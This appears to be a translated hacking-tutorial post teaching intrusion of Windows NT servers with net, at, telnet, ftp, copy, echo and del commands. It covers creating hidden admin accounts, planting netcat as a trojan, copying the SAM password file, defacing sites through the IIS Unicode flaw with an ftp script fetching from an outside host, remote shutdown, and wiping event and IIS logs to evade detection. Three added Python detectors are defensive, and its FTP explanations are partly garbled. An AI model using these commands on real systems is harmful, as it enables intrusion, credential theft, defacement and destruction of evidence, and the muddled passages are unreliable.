12 Network-related DOS Commands

Source: Internet
Author: User
Tags: net command, net time
1: Net

As long as you have a user name and password for an IP address, you can connect to it with IPC$!
Here we assume that the user you obtained is lxnull with the password 123456, and that the other party's IP address is 127.0.0.1.
net use \\127.0.0.1\ipc$ 123456 /user:lxnull (if the password is blank, put "" in its place)
The command to disconnect is
net use \\127.0.0.1\ipc$ /delete
net share shows the host's shared resources. We use it to create a hidden share: net share me=c:\winnt\system32 gives this machine a share named me which, when opened, is the system32 directory under winnt. If you use Win2000 you know how important this directory is. If you no longer want the share, run net share me /delete. Isn't that convenient?
The following operations can only be used after you have logged in; the login method is given above.
Next, how to create a user, because SA permission is equivalent to the system's super user.
We add a user heibai with the password lovechina:
net user heibai lovechina /add
As long as the command reports success, we can add the user to the Administrators group:
net localgroup administrators heibai /add
Now for the other party's C drive. Other drives can be used too, as long as they exist. Here we map the other party's C drive to local drive Z:
net use z: \\127.0.0.1\c$
net start telnet
This starts the other party's telnet service.
Here we activate the Guest user. Guest is NT's default user and cannot be deleted? I'm not sure whether that is so; my Win2000 won't let me delete it.
net user guest /active:yes (Note: this command re-activates the previously disabled Guest account)
net user guest /active:no disables the Guest user again.
Here we change a user's password to lovechina. Other users can also change the Guest password, as long as you have the permission!
net user guest lovechina
If someone asks about privilege escalation, the following solves it:
net localgroup administrators guest /add
This turns Guest into an administrator.
The net command really is powerful! Now the net view command.
net user lists all users, so you can see which user was added by an intruder like you and delete that user name to tidy him up:
net user username /delete. Haha, he is gone. Then check whether he was an administrator. Let's also check which users are in the Administrators group, since those are the users useful to us: net localgroup administrators lists the members of the Administrators group. Then look at the administrator user, which was created when the system was installed, so it tells you when the system was created:
net user administrator, then check the creation times of the other administrator users. If they differ too much, the account may have been planted by someone else; del it and keep only the one. Security first ................
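For the defender's side of the account commands above, here is an added example (not part of the original post) that reads a constructed Security-log export and flags the events these net commands leave behind, then pairs a creation with a quick promotion to Administrators; the JSON field names are simplified assumptions.

```python
import json
from datetime import datetime, timedelta

# Security-log event IDs recording the account actions in section 1: net user /add,
# net localgroup administrators /add, net user guest /active:yes, net user <n> <pw>.
ACCOUNT_EVENTS = {
    4720: "user account created",
    4722: "user account enabled",
    4724: "password reset by another account",
    4726: "user account deleted",
    4732: "member added to security-enabled local group",
}
PRIVILEGED_GROUPS = {"administrators"}

# Constructed sample export (JSON lines, simplified field names); not real data.
SAMPLE_LOG = """\
{"EventID": 4720, "TimeCreated": "2001-03-01T02:11:07", "SubjectUserName": "sa", "TargetUserName": "heibai"}
{"EventID": 4732, "TimeCreated": "2001-03-01T02:11:09", "SubjectUserName": "sa", "TargetUserName": "Administrators", "MemberName": "heibai"}
{"EventID": 4722, "TimeCreated": "2001-03-01T02:12:30", "SubjectUserName": "sa", "TargetUserName": "Guest"}
{"EventID": 4724, "TimeCreated": "2001-03-01T02:12:41", "SubjectUserName": "sa", "TargetUserName": "Guest"}
{"EventID": 4732, "TimeCreated": "2001-03-01T09:00:00", "SubjectUserName": "admin", "TargetUserName": "Users", "MemberName": "bob"}
"""

def parse_events(text):
    # One JSON object per non-empty line.
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def flag_account_changes(events):
    # Keep the account-management events an analyst should review.
    findings = []
    for e in events:
        eid = e.get("EventID")
        if eid not in ACCOUNT_EVENTS:
            continue
        # Group membership changes only matter for privileged groups.
        if eid == 4732 and e.get("TargetUserName", "").lower() not in PRIVILEGED_GROUPS:
            continue
        findings.append({"time": e["TimeCreated"], "event_id": eid,
                         "account": e.get("MemberName") or e.get("TargetUserName"),
                         "actor": e.get("SubjectUserName"), "reason": ACCOUNT_EVENTS[eid]})
    return findings

def created_then_promoted(findings, window=timedelta(minutes=10)):
    # Pair a 4720 with a later privileged 4732 for the same account inside the
    # window: the "net user /add" then "net localgroup administrators /add" pattern.
    created = {f["account"].lower(): f for f in findings if f["event_id"] == 4720}
    pairs = []
    for f in findings:
        c = created.get(f["account"].lower())
        if f["event_id"] == 4732 and c is not None:
            delta = datetime.fromisoformat(f["time"]) - datetime.fromisoformat(c["time"])
            if timedelta(0) <= delta <= window:
                pairs.append((f["account"], int(delta.total_seconds())))
    return pairs
```

Run flag_account_changes(parse_events(SAMPLE_LOG)) and feed the result to created_then_promoted to see the heibai creation and promotion two seconds apart.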

2:

Generally a hacker leaves a backdoor after an intrusion, that is, a Trojan horse. How do you start the trojan once you have uploaded it?
Use the at command. Assume that you have already logged on to the server.
First you need to get the other party's time:
net time \\127.0.0.1
A time is returned. Assume that the time is. Now create a new job with ID = 1:
at \\127.0.0.1 12:3 nc.exe
This assumes that a trojan named nc.exe is stored on the other party's server.
nc is short for Netcat. It is renamed to make it easier to type. It provides a telnet-like service, and the port is 99.
At that time you can connect to the other party's port 99. In this way a trojan has been planted on the other party.
The at command is powerful. For example:
C:\>at start c:\prettyboytasks
A new job has been added with job ID = 1 [now we have a new job; the system will automatically play the song at that time]

3: Telnet

This command is very practical. It connects to a remote machine, but normally a user name and password are required. Since you have planted a trojan on the other party, you connect directly to the port that the trojan opened:
telnet 127.0.0.1 99
This connects you to the other party's port 99. Then you can run commands on the other party, which has become a zombie.

4: ftp

ftp uploads your stuff to the other machine. You can apply for a web space that supports FTP upload; in China, if you cannot find one, I recommend www.51.net, which is good. After the application is complete it gives you the user name, password, and FTP server.
Before uploading you need to log in first. Here we assume the FTP server is www.51.net, the user name is hucjs, and the password is 654321.
ftp www.51.net
It will ask for the user name and password.
Next, uploading. Assume the file you want to upload is index.htm, located under C:\, and you upload it to the other party's D:\
get C:\index.htm D:\
Suppose you want to put the index.htm on the other party's drive C onto drive D of your machine:
put C:\index.htm D:\
The problem here is that the explanations of the two commands are reversed. After logging on to the FTP server, get is download and put is upload, which is the opposite of the TFTP command: in tftp, get means uploading and put means downloading. In addition, C:\ and D:\ cannot be used to specify the path on the FTP server; that is also the TFTP method, and FTP will not execute it. If you don't believe it, try it. The correct way, if you want to upload a file, is put index.htm, which uploads the index.htm in the C root directory to the current directory of the FTP server; if you don't want it, del index.htm deletes the file. When downloading, check the directory first: dir shows what is in the directory, then get index.htm downloads index.htm to your own C root directory.
get index.htm C:\inetpub\wwwroot\index.htm (this downloads the index.htm on your space to the other party's C:\inetpub\wwwroot\index.htm)

5: Copy

Next, how to copy a local file to the other party's hard disk. You need to establish an IPC$ connection first.
Copy the index.htm on drive C to drive C of 127.0.0.1:
copy index.htm \\127.0.0.1\c$\index.htm
If you want to copy it to drive D instead, just change c$ to d$, that's all!
copy index.htm \\127.0.0.1\d$\index.htm
If you want to copy it to the WINNT directory,
enter
copy index.htm \\127.0.0.1\admin$\index.htm
admin$ is winnt.
Copying the other party's file: by the way, the NT backup database is stored in X:\winnt\repair\sam._ ; sam._ is the database file name.
Copy the database of 127.0.0.1 to the local drive C:
copy \\127.0.0.1\admin$\repair\sam._ c:\
This sam._ is obviously the password file of the NT host. On a Win2000 machine the password file should be sam.

6: Set

If you break into a machine and want to deface it (this idea only applies in special cases), port 80 must of course be open, or perhaps you want to deface it anyway. In that case, use the set command!
The following is my result. I'll analyze it; the point is simply to find the home page.
COMPUTERNAME=PentiumII
ComSpec=D:\winnt\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=(the IP address of the currently logged-in user; it was shown here and has been removed)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\winnt\system32\os2\dll;
OS=Windows_NT
Path=D:\winnt\system32;D:\winnt
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot    (the home page address: whatever follows PATH_TRANSLATED= is the directory where the home page is stored; here it is E:\vlroot)
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=xx.xx
REMOTE_HOST=xx.xx
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=xx.xx
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0    (the other party uses IIS/3.0)
SystemDrive=D:
SystemRoot=D:\winnt
TZ=GMT-9
USERPROFILE=D:\winnt\profiles\Default User
windir=D:\winnt
The highlighted line is the address of the other party's home page. This is a very clumsy trick, but it is the only way to find the name of the home page with certainty: when you dir that directory you will certainly see many files. Open each file in the browser as xx.xx.xx.xx/filename; the one that looks exactly the same as xx.xx.xx.xx is the home page.

7: NBTSTAT

If you scan an NT host and one of ports 136 to 139 is open, use this command to get the user name. By the way, this is NetBIOS. Once you have the user name you can guess the password, for example a simple password the same as the user name. If that fails, just crack it!
Many NT hosts on the Internet now have these ports open. You can practice and analyze the results.
The command is
nbtstat -A xx.xx
-A must be capitalized.
In my opinion there is no big difference between uppercase and lowercase; the usage is the same.
Then connect with net use \\<ip address of the other party>!
net view \\ip views the shared folders of the other party's IP address
net use x: \\ip\sharename maps the other party's shared folder as drive X on the local machine
This is the basic usage of port 139! The premise, however, is that the other party must have a share!
netstat -n shows who is connected to you
The following is the result.
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
   PentiumII      <00>  UNIQUE      Registered
   PentiumII      <20>  UNIQUE      Registered
   Orahotown      <00>  GROUP       Registered
   Orahotown      <1C>  GROUP       Registered
   Orahotown      <1B>  UNIQUE      Registered
   PentiumII      <03>  UNIQUE      Registered
   INet~Services  <1C>  GROUP       Registered
   IS~PentiumII...<00>  UNIQUE      Registered
   Orahotown      <1E>  GROUP       Registered
   Orahotown      <1D>  UNIQUE      Registered
   ..__MSBROWSE__.<01>  GROUP       Registered

   MAC Address = 00-E0-29-14-35-BA
The highlighted entry is the user logged on to this system. You may not know what to make of it: do you see the number? The entry whose number is <03> is the user; here the user is PentiumII.
No <03> entry. Note: the MAC address is not bound to the IP address.

8: Shutdown

The command to shut down the other party's NT server:
shutdown \\ip /t:20
After 20 seconds NT shuts down automatically. Think twice before running this command: it causes great loss to the other party, and a conscientious hacker is needed.
Telnet in and use commands or local software to restart the other party's computer.
shutdown -m \\computername can remotely restart or shut down the machine.

9: Dir

This command needs no explanation but is very important. It lists all the files and folders in a directory.
You can try it locally.

10: Echo

The famous Unicode vulnerability can be used to easily hack hosts that have it.
Let's assume we want to write "The evidence of the Nanjing massacre is as solid as a mountain. The Japanese cannot deny it!" into index.htm. There are two ways; let's see the difference.
echo The evidence of the Nanjing massacre is as solid as a mountain. The Japanese cannot deny it! > index.htm
echo The evidence of the Nanjing massacre is as solid as a mountain. The Japanese cannot deny it! >> index.htm
The first overwrites the original content of index.htm with "The evidence of the Nanjing massacre is as solid as a mountain. The Japanese cannot deny it!".
The second appends "The evidence of the Nanjing massacre is as solid as a mountain. The Japanese cannot deny it!" to index.htm. ">>" appends to the file, and ">" overwrites the original file.
Here < and > are the redirection operators: one is input redirection and the other is output redirection. For example, the command prompt shows C:\>, which means the prompt of drive C is directed at us. Similarly there is the pipe, |, which connects two commands: the command on the left of the pipe runs first, then the command on the right. But I can't explain DOS commands to a beginner; if you want to study them, buy a DOS book. Half a year is enough.
You can try it locally.
You may ask, what is interesting about this? In fact, it can be used to download the home page into the other party's directory.
1. First, apply for a free home page.
2. Use echo to create a TXT file in a writable directory (taking the chinaren server as an example):
open upload.chinaren.com
cnhack (the user name from your application)
test (the password from your application)
get index.htm C:\inetpub\wwwroot\index.htm (this downloads the index.htm on your space to the other party's C:\inetpub\wwwroot\index.htm)
bye (exits the FTP session; under Win98 this is like leaving DOS, which you do with exit)
Specific steps:
Enter echo open upload.chinaren.com > C:\cnhack.txt
Enter echo cnhack >> C:\cnhack.txt
Enter echo 39abs >> C:\cnhack.txt
Enter echo get index.htm C:\inetpub\wwwroot\index.htm >> C:\cnhack.txt
Finally, enter ftp -s:C:\cnhack.txt (the ftp -s parameter executes the commands in the file).
When the command completes, the file has been downloaded to the location you specified.
Note: after obtaining the file, delete cnhack.txt. (If you don't delete it, the password is easily seen by others.)
Remember: del C:\cnhack.txt
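As a detection counterpart to the cmd.exe request visible in section 6's set output and to the Unicode echo trick in this section, here is an added example (not from the original post) that scans constructed IIS log lines for traversal to cmd.exe after decoding; the log field layout is an assumed, simplified W3C format.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed W3C-style IIS log lines (date time c-ip cs-method cs-uri-stem cs-uri-query
# sc-status); not real data. The cmd.exe lines mirror sections 6 and 10 of the text.
SAMPLE_IIS_LOG = """\
2001-03-01 02:15:44 10.0.0.5 GET /scripts/..%2f../winnt/system32/cmd.exe /c+set 200
2001-03-01 02:16:02 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+echo+test+>+index.htm 200
2001-03-01 09:00:00 10.0.0.9 GET /index.htm - 200
2001-03-01 09:00:05 10.0.0.9 GET /images/logo.gif - 304
"""
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
SHELL = re.compile(r"/cmd\.exe$")

def decode_uri(raw):
    # Percent-decode, then map overlong two-byte UTF-8 sequences (%c0%af is an overlong
    # '/') to the character they encode: a strict decoder rejects them, the vulnerable
    # IIS versions accepted them, so the detector has to see what the server saw.
    b = unquote_to_bytes(raw)
    out, i = [], 0
    while i < len(b):
        c = b[i]
        if c in (0xC0, 0xC1) and i + 1 < len(b) and 0x80 <= b[i + 1] <= 0xBF:
            out.append(chr(((c & 0x1F) << 6) | (b[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(c) if c < 0x80 else "?")
            i += 1
    return "".join(out).replace("\\", "/").lower()

def parse_line(line):
    date, time, cip, method, stem, query, status = line.split()
    return {"time": date + " " + time, "client": cip, "method": method,
            "stem": stem, "query": query, "status": int(status)}

def classify(entry):
    # Reasons this request deserves attention, in a fixed order (empty = benign).
    stem = decode_uri(entry["stem"])
    reasons = []
    if TRAVERSAL.search(stem):
        reasons.append("directory traversal after decoding")
    if SHELL.search(stem):
        reasons.append("command interpreter requested through the web server")
        if entry["query"] != "-":
            reasons.append("arguments: " + entry["query"])
        if entry["status"] == 200:
            reasons.append("status 200: the command most likely ran")
    return reasons

def scan(text):
    hits = []
    for e in (parse_line(ln) for ln in text.splitlines() if ln.strip()):
        reasons = classify(e)
        if reasons:
            hits.append((e["time"], e["client"], e["stem"], reasons))
    return hits
```

scan(SAMPLE_IIS_LOG) returns the two cmd.exe requests with their reasons and leaves the ordinary page and image requests alone.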

11: attrib

This command sets file attributes. If you want to deface a website and its home page's file attribute is set to read-only, that's awkward: you can't delete it and you can't overwrite it. Frustrating! But don't be afraid; there is this command.
attrib -r index.htm
This command removes the read-only attribute of index.htm.
If you change "-" to "+", the file's attribute is set to read-only.
attrib +r index.htm
This command sets the attribute of index.htm to read-only.
Use attrib first to query attributes, as in attrib filename, which displays the file's attributes. There is more than the R attribute; in fact there are four in total: A archive attribute, R read-only attribute, H hidden attribute, S system attribute, and they can be used as needed. I think it is more interesting to add the hidden attribute to the uploaded file. (Continued; keep picking the errors out of the post.)

12: del

Don't fall over when you see this title! Now we are leaving 127.0.0.1. Before leaving, delete the logs. You must delete the logs! Do you want to get caught? Haha.
NT logs are these:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\system32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
You only need to delete these. Some NT systems are installed on D: or another disk; then change C: to that disk.
Default location of the Internet Information Service FTP logs: %SystemRoot%\system32\logfiles\msftpsvc1\. One log is generated per day by default.
Default location of the Internet Information Service WWW logs: %SystemRoot%\system32\logfiles\w3svc1\. One log is generated per day by default.
Default location of the Scheduler service log: %SystemRoot%\schedlgu.txt
The registry keys for the above logs:
Application, security, system, and DNS server logs. These log files are recorded in the registry under:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog
Some administrators may relocate these logs. There are many subkeys under EventLog, which give the directory where each of the above logs is located.
The Scheduler service log is in the registry at
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent
del does delete files, and the logs are indeed log files. But with the above method you cannot clear your own entries, because the system is continuously writing log records; while you do this it keeps recording and never stops. You will often see that when you delete a file the system refuses the deletion; that shows the system is running something already resident in memory, and of course you cannot delete it like that. I'm afraid that deleting this way only helps others clean their logs while my own part stays undeleted, hahahahahahahaha. If you ask how to clean them up, I'd just say everyone should use Xiao Rong's tool; it is fast and good. Why use cumbersome command lines, especially for those used to the Windows desktop, where it is obviously too troublesome? I recommend Xiao Rong's elsave tool for cleaning logs: fast, clean, and it saves effort. I am not advertising.
Third-party tools: for example, Xiaoyi's elsave.exe can remotely clear the system, application, and security logs.
It is easy to use. First, use the obtained administrator account to establish an IPC session with the other party: net use \\ip pass /user:user
Then run elsave -s \\ip -l Application -C on the command line to delete the security log.
In fact, this software can also back up logs; just add the parameter -f filename, which will not be detailed here.
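Since the text notes that IIS writes one log file per day, here is an added example (not from the original post) that audits a constructed w3svc1 directory listing for missing days and emptied files, the kind of hole the del commands above leave behind; the exYYMMDD.log naming is IIS's daily W3C log convention, and the listing is constructed.

```python
import re
from datetime import date, timedelta

# Constructed listing of %SystemRoot%\system32\logfiles\w3svc1 as (name, size in
# bytes); not real data. IIS names its daily W3C logs exYYMMDD.log, one per day.
SAMPLE_LISTING = [
    ("ex010225.log", 48211), ("ex010226.log", 51007), ("ex010227.log", 49990),
    ("ex010301.log", 0), ("ex010302.log", 50233),
]
LOG_NAME = re.compile(r"^ex(\d{2})(\d{2})(\d{2})\.log$", re.IGNORECASE)

def log_date(name):
    # Date encoded in an exYYMMDD.log name, or None for any other file.
    m = LOG_NAME.match(name)
    if not m:
        return None
    yy, mm, dd = (int(x) for x in m.groups())
    return date(2000 + yy if yy < 70 else 1900 + yy, mm, dd)

def audit_daily_logs(listing):
    # Return (missing_days, empty_logs) over the span covered by the listing.
    # Caveat: IIS only creates a day's file on the first request, so a missing
    # day on an idle server is normal; a zero-byte file or a hole in the middle
    # of a busy week is what should raise a question.
    by_day = {}
    for name, size in listing:
        d = log_date(name)
        if d is not None:
            by_day[d] = size
    if not by_day:
        return [], []
    missing, empty = [], []
    d, last = min(by_day), max(by_day)
    while d <= last:
        if d not in by_day:
            missing.append(d.isoformat())
        elif by_day[d] == 0:
            empty.append(d.isoformat())
        d += timedelta(days=1)
    return missing, empty
```

On the constructed listing, audit_daily_logs reports 2001-02-28 as missing and 2001-03-01 as emptied.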
Want to crash someone else on the LAN? If their shared drive (Win98 without patches) is enabled, enter
\\<his IP address or machine name>\c\con\con
